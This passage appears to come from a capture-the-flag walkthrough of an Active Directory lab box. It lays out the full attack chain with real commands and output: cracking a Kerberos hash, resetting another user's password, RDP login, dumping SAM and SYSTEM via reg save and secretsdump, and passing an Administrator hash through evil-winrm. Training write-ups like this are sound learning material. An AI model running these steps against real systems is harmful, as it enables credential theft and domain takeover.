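        print(row)
```

Run it over the tool's output file before cracking: RC4 rows go to john or hashcat first, AES rows (which appear when an account has RC4 disabled through msDS-SupportedEncryptionTypes) are far slower per guess and usually only worth the time for a short wordlist.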
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
haze1988 (?)
1g 0:00:00:07 DONE (2024-10-19 14:39) 0.1381g/s 1058Kp/s 1058Kc/s 1058KC/s hazel564..hazamanaz
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
With another new set of credentials, time to check BloodHound again. BloodHound shows that the admins OU contains the tier1 objects and that hazel.green has rights over it, so those rights should apply to the molly.smith user too, including resetting her password. net rpc does the reset over SMB:
net rpc password "Molly.Smith" "P@ssw0rd" -U "hokkaido-aerospace.com"/"hazel.green"%'haze1988' -S 192.168.135.40
Port 3389
Now that the password has been changed, time to check it with netexec.
netexec rdp 192.168.135.40 -u molly.smith -p 'P@ssw0rd'
RDP 192.168.135.40 3389 DC [*] Windows 10 or Windows Server 2016 Build 20348 (name:DC) (domain:hokkaido-aerospace.com) (nla:True)
RDP 192.168.135.40 3389 DC [+] hokkaido-aerospace.com\molly.smith:P@ssw0rd (Pwn3d!)
The Pwn3d! tag means netexec completed the RDP logon, so I can open a desktop session straight away with xfreerdp.
xfreerdp /cert-ignore /u:molly.smith /p:P@ssw0rd /v:192.168.135.40
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Users\molly.smith>whoami
haero\molly.smith
I have a shell now, but not as an administrator, so time for privilege escalation.
Privilege Escalation
I tried uploading winPEAS, but the machine has antivirus enabled and it removed the binary as soon as it landed. So I checked manually instead, starting with my own token.
C:\Users\Public>whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
haero\molly.smith S-1-5-21-3227296914-974780204-1325941497-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Group used for deny only
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
HAERO\Tier1-Admins Group S-1-5-21-3227296914-974780204-1325941497-1141 Mandatory group, Enabled by default, Enabled group
HAERO\it Group S-1-5-21-3227296914-974780204-1325941497-1105 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
HAERO\WSUS Administrators Alias S-1-5-21-3227296914-974780204-1325941497-1103 Mandatory group, Enabled by default, Enabled group, Local Group
HAERO\WSUS Reporters Alias S-1-5-21-3227296914-974780204-1325941497-1104 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Two things stand out in this token. The user is in HAERO\Tier1-Admins, and BUILTIN\Server Operators is listed but marked "Group used for deny only": UAC filtered it out of this medium-integrity token. Since a group with admin in its name suggested an elevated role, I opened a command prompt with "Run as administrator" using the same credentials. That did not give me an administrator shell, but it did give me the unfiltered high-integrity token, where Server Operators is enabled and brings its user rights with it.
C:\Windows\system32>whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
haero\molly.smith S-1-5-21-3227296914-974780204-1325941497-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
HAERO\Tier1-Admins Group S-1-5-21-3227296914-974780204-1325941497-1141 Mandatory group, Enabled by default, Enabled group
HAERO\it Group S-1-5-21-3227296914-974780204-1325941497-1105 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
HAERO\WSUS Administrators Alias S-1-5-21-3227296914-974780204-1325941497-1103 Mandatory group, Enabled by default, Enabled group, Local Group
HAERO\WSUS Reporters Alias S-1-5-21-3227296914-974780204-1325941497-1104 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeSystemtimePrivilege Change the system time Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
The elevated shell now holds SeBackupPrivilege (and SeRestorePrivilege). whoami lists it as Disabled, but that only means it is not yet enabled in the token; reg.exe enables it for itself when saving a hive, so I can dump SAM and SYSTEM straight from the registry.
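The difference between the two whoami dumps is the whole privilege-escalation story here, so the following added example (not from the walkthrough) parses both and reports what UAC filtering had removed: groups marked "Group used for deny only" that become enabled, the change in integrity level, and the privileges that appear. The two embedded samples are trimmed copies of the outputs above with the column padding collapsed, as the page shows them.

```python
import re
from typing import Dict

_GROUP = re.compile(
    r"^(?P<name>.+?)\s+(?P<type>Well-known group|Alias|Group|Label)\s+"
    r"(?P<sid>S-1-[\d-]+)\s*(?P<attrs>.*)$"
)
_PRIV = re.compile(r"^(?P<name>Se\w+Privilege)\s+.*\s(?P<state>Enabled|Disabled)$")
_LABEL = re.compile(r"Mandatory Label\\(?P<level>\w+) Mandatory Level")


def parse_whoami(text: str) -> dict:
    """Parse the text of `whoami /all` into groups, privileges and integrity level."""
    groups: Dict[str, str] = {}
    privs: Dict[str, str] = {}
    integrity = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith("INFORMATION"):
            section = line.split()[0]  # USER / GROUP / PRIVILEGES
            continue
        if section == "GROUP":
            m = _GROUP.match(line)
            if not m:
                continue  # column header or ==== rule
            lab = _LABEL.search(m.group("name"))
            if lab:
                integrity = lab.group("level")
            else:
                groups[m.group("name")] = m.group("attrs")
        elif section == "PRIVILEGES":
            m = _PRIV.match(line)
            if m:
                privs[m.group("name")] = m.group("state")
    return {"groups": groups, "privileges": privs, "integrity": integrity}


def token_diff(before: str, after: str) -> dict:
    """What the elevated token has that the filtered one lacked."""
    b, a = parse_whoami(before), parse_whoami(after)
    unfiltered = sorted(
        g for g, attrs in b["groups"].items()
        if "deny only" in attrs and "deny only" not in a["groups"].get(g, "deny only")
    )
    gained = sorted(p for p in a["privileges"] if p not in b["privileges"])
    return {
        "integrity": (b["integrity"], a["integrity"]),
        "unfiltered_groups": unfiltered,
        "gained_privileges": gained,
        # reg save enables SeBackupPrivilege itself; held-but-disabled is enough.
        "can_save_hives": "SeBackupPrivilege" in a["privileges"],
    }


# Trimmed copies of the two whoami /all outputs from the walkthrough.
MEDIUM_TOKEN = r"""
USER INFORMATION
----------------
User Name SID
haero\molly.smith S-1-5-21-3227296914-974780204-1325941497-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\Server Operators Alias S-1-5-32-549 Group used for deny only
HAERO\Tier1-Admins Group S-1-5-21-3227296914-974780204-1325941497-1141 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

HIGH_TOKEN = r"""
USER INFORMATION
----------------
User Name SID
haero\molly.smith S-1-5-21-3227296914-974780204-1325941497-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
HAERO\Tier1-Admins Group S-1-5-21-3227296914-974780204-1325941497-1141 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
SeMachineAccountPrivilege Add workstations to domain Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
"""

if __name__ == "__main__":
    print(token_diff(MEDIUM_TOKEN, HIGH_TOKEN))
```

Save whoami /all from the normal and the elevated prompt to two files and diff them this way; a group that flips from "deny only" to enabled is the one carrying the new rights, which is what tells you to look at Server Operators here rather than at Tier1-Admins.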
C:\Users\Public>reg save hklm\sam sam
The operation completed successfully.
C:\Users\Public>reg save hklm\system system
The operation completed successfully.
I then transferred both files to my host and extracted the hashes with secretsdump.
impacket-secretsdump -sam sam -system system local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
One caveat on what was dumped: the local SAM of a domain controller holds the DSRM (Directory Services Restore Mode) Administrator, not the domain account, and the domain hashes themselves live in NTDS.dit. The hash is still worth trying, and here it authenticated as the domain Administrator, so the two passwords match. With it, I passed the hash over WinRM.
evil-winrm -i 192.168.135.40 -u Administrator -H d752482897d54e239376fddb2a2109e4
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
haero\administrator
With that, I have the administrator shell ~
Things I learned from this machine
- enumerate users with kerbrute if there is nothing else to do; the password might be the username
- get the BloodHound data as soon as possible and understand it
- GenericWrite on a user = can get the user's hash through a targeted Kerberoast (my own understanding)
- can change another user's password if they are under an OU I have rights over (I'm also not that sure)
- run cmd as administrator if in a group with admin in its name, or just try it
- SeBackupPrivilege = can get SAM and SYSTEM